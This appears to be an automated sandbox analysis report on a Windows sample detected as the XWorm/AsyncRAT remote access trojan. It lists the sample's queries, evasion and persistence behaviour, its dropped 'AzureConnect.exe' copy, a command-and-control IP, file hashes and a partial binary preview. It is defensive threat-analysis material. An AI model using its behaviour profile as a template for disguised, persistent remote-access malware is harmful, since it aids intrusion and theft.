            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeQueries volume information: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe VolumeInformation
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeQueries volume information: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe VolumeInformation
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: file.exe, 00000000.00000002.3313459605.000000001C25B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3313459605.000000001C1E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: file.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.file.exe.f20000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.2018283335.0000000000F22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 3364, type: MEMORYSTR
            Source: Yara matchFile source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe, type: DROPPED

            Remote Access Functionality

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: file.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.file.exe.f20000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.2018283335.0000000000F22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 3364, type: MEMORYSTR
            Source: Yara matchFile source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe, type: DROPPED

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		11
            Process Injection            		1
            Masquerading            		OS Credential Dumping221
            Security Software Discovery            		Remote Services11
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		1
            DLL Side-Loading            		1
            Scheduled Task/Job            		11
            Disable or Modify Tools            		LSASS Memory1
            Process Discovery            		Remote Desktop ProtocolData from Removable Media1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell            		Logon Script (Windows)1
            DLL Side-Loading            		131
            Virtualization/Sandbox Evasion            		Security Account Manager131
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Obfuscated Files or Information            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1572730 Sample: file.exe Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 43 Suricata IDS alerts for network traffic 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 13 other signatures 2->49 7 file.exe 7 2->7         started        12 AzureConnect.exe 2->12         started        14 AzureConnect.exe 2->14         started        process3 dnsIp4 37 147.185.221.24, 3804, 49797, 49803 SALSGIVERUS United States 7->37 39 127.0.0.1 unknown unknown 7->39 35 C:\ProgramData\...\AzureConnect.exe, PE32 7->35 dropped 51 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 7->51 53 Protects its processes via BreakOnTermination flag 7->53 55 Bypasses PowerShell execution policy 7->55 57 2 other signatures 7->57 16 powershell.exe 23 7->16         started        19 powershell.exe 22 7->19         started        21 powershell.exe 23 7->21         started        23 2 other processes 7->23 file5 signatures6 process7 signatures8 41 Loading BitLocker PowerShell Module 16->41 25 conhost.exe 16->25         started        27 conhost.exe 19->27         started        29 conhost.exe 21->29         started        31 conhost.exe 23->31         started        33 conhost.exe 23->33         started        process9

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            file.exe79%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
            file.exe100%AviraHEUR/AGEN.1305769
            file.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe100%AviraHEUR/AGEN.1305769
            C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe100%Joe Sandbox ML
            C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe79%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://go.microsoft.c0%Avira URL Cloudsafe
            http://crl.micros0%Avira URL Cloudsafe
            http://crl.micros10%Avira URL Cloudsafe
            147.185.221.240%Avira URL Cloudsafe
            https://go.microsoft.co0%Avira URL Cloudsafe
            http://www.apache.o0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            147.185.221.24true
            • Avira URL Cloud: safe
            		unknown
            127.0.0.1false
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2126110670.000001DB10071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2221822786.00000239A3851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2354795322.0000023FB0271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2547077221.000002015616F000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.2412375981.0000020146329000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://go.microsoft.copowershell.exe, 00000008.00000002.2371240954.0000023FB85E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.microsopowershell.exe, 0000000A.00000002.2572896915.000002015E440000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2106136819.000001DB00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2169305461.0000023993A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2269885905.0000023FA0429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2412375981.0000020146329000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.2412375981.0000020146329000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://crl.micros1powershell.exe, 00000002.00000002.2137614904.000001DB7BB30000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2106136819.000001DB00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2169305461.0000023993A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2269885905.0000023FA0429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2412375981.0000020146329000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/powershell.exe, 0000000A.00000002.2547077221.000002015616F000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2126110670.000001DB10071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2221822786.00000239A3851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2354795322.0000023FB0271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2547077221.000002015616F000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/Licensepowershell.exe, 0000000A.00000002.2547077221.000002015616F000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Iconpowershell.exe, 0000000A.00000002.2547077221.000002015616F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://go.microsoft.cpowershell.exe, 00000005.00000002.2166015736.0000023991C49000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://go.microsoft.ctainpowershell.exe, 00000005.00000002.2166015736.0000023991C49000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.2106136819.000001DB00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2169305461.00000239937E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2269885905.0000023FA0201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2412375981.0000020146101000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.apache.opowershell.exe, 00000002.00000002.2137177899.000001DB7BAAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000000.00000002.3283038560.0000000003201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2106136819.000001DB00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2169305461.00000239937E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2269885905.0000023FA0201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2412375981.0000020146101000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.2412375981.0000020146329000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://crl.microspowershell.exe, 0000000A.00000002.2577205128.000002015E5E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          147.185.221.24
                                          		unknownUnited States
                                          		12087SALSGIVERUStrue

                                          Private

                                          IP
                                          127.0.0.1

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1572730
                                          Start date and time:2024-12-10 19:44:11 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 5m 50s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:17
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:file.exe
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@18/19@0/2
                                          EGA Information:
                                          • Successful, ratio: 14.3%
                                          HCA Information:
                                          • Successful, ratio: 98%
                                          • Number of executed functions: 59
                                          • Number of non-executed functions: 5
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe

                                          Warnings

                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                          • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target AzureConnect.exe, PID 1772 because it is empty
                                          • Execution Graph export aborted for target AzureConnect.exe, PID 6540 because it is empty
                                          • Execution Graph export aborted for target powershell.exe, PID 1352 because it is empty
                                          • Execution Graph export aborted for target powershell.exe, PID 1876 because it is empty
                                          • Execution Graph export aborted for target powershell.exe, PID 320 because it is empty
                                          • Execution Graph export aborted for target powershell.exe, PID 5240 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtCreateKey calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • VT rate limit hit for: file.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          13:45:08API Interceptor54x Sleep call for process: powershell.exe modified
                                          13:46:01API Interceptor117439x Sleep call for process: file.exe modified
                                          19:46:03Task SchedulerRun new task: AzureConnect path: C:\ProgramData\Program s>Files\Microsoft\AzureConnect\AzureConnect.exe

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          147.185.221.24NhoqAfkhHL.batGet hashmaliciousUnknownBrowse
                                            a4lIk1Jrla.exeGet hashmaliciousNjrat, RevengeRATBrowse
                                              W6s1vzcRdj.exeGet hashmaliciousXWormBrowse
                                                u7e3vb5dfk.exeGet hashmaliciousXWormBrowse
                                                  aOi4JyF92S.exeGet hashmaliciousXWormBrowse
                                                    PG4w1WB9dE.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                      a4BE6gJooT.exeGet hashmaliciousXWormBrowse
                                                        grK0Oh8p4Z.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                          SplpM1fFkV.exeGet hashmaliciousUnknownBrowse
                                                            msedge.exeGet hashmaliciousAsyncRAT, XWormBrowse

                                                              Domains

                                                              No context

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              SALSGIVERUSNhoqAfkhHL.batGet hashmaliciousUnknownBrowse
                                                              • 147.185.221.24
                                                              sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                              • 147.160.103.28
                                                              a4lIk1Jrla.exeGet hashmaliciousNjrat, RevengeRATBrowse
                                                              • 147.185.221.24
                                                              W6s1vzcRdj.exeGet hashmaliciousXWormBrowse
                                                              • 147.185.221.24
                                                              u7e3vb5dfk.exeGet hashmaliciousXWormBrowse
                                                              • 147.185.221.24
                                                              aOi4JyF92S.exeGet hashmaliciousXWormBrowse
                                                              • 147.185.221.24
                                                              ozgpPwVAu1.exeGet hashmaliciousXWormBrowse
                                                              • 147.185.221.22
                                                              PG4w1WB9dE.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                              • 147.185.221.24
                                                              a4BE6gJooT.exeGet hashmaliciousXWormBrowse
                                                              • 147.185.221.24
                                                              grK0Oh8p4Z.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                              • 147.185.221.24

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\file.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):46592
                                                              Entropy (8bit):6.045708896884392
                                                              Encrypted:false
                                                              SSDEEP:768:JXDCY0GcQ5pcP7tbaRcqKlnFPc9Goxq6sOuhe/gDu/cjGBd00:JOLeKkRMFk9Gv6sOuOUzGBdl
                                                              MD5:2982D11D3B0789476831097F0E213007
                                                              SHA1:B2B7D5F73B65C3DF4D3DA8A5A266F47D3685A044
                                                              SHA-256:BDFF38AE5B6AC3AB4135894064D15E3AB14EFE28B9463C98B185FB0CDFD3AD1F
                                                              SHA-512:B496DB043EE6758E63C3F2AA2E2B03775EAAF657638DAA0B989ED85221A4C98FB7FBD53F836CA4D12DCF1C536222D65D398D543F39AD0447666E4842A39F8CDE
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe, Author: Joe Security
                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe, Author: ditekSHen
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 79%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Hg................................. ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......(_...T............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AzureConnect.exe.log

                                                              Download File
                                                              Process:C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe
                                                              File Type:CSV text
                                                              Category:dropped
                                                              Size (bytes):654
                                                              Entropy (8bit):5.380476433908377
                                                              Encrypted:false
                                                              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                              MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                              SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                              SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                              SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                              Malicious:false
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:modified
                                                              Size (bytes):64
                                                              Entropy (8bit):0.34726597513537405
                                                              Encrypted:false
                                                              SSDEEP:3:Nlll:Nll
                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
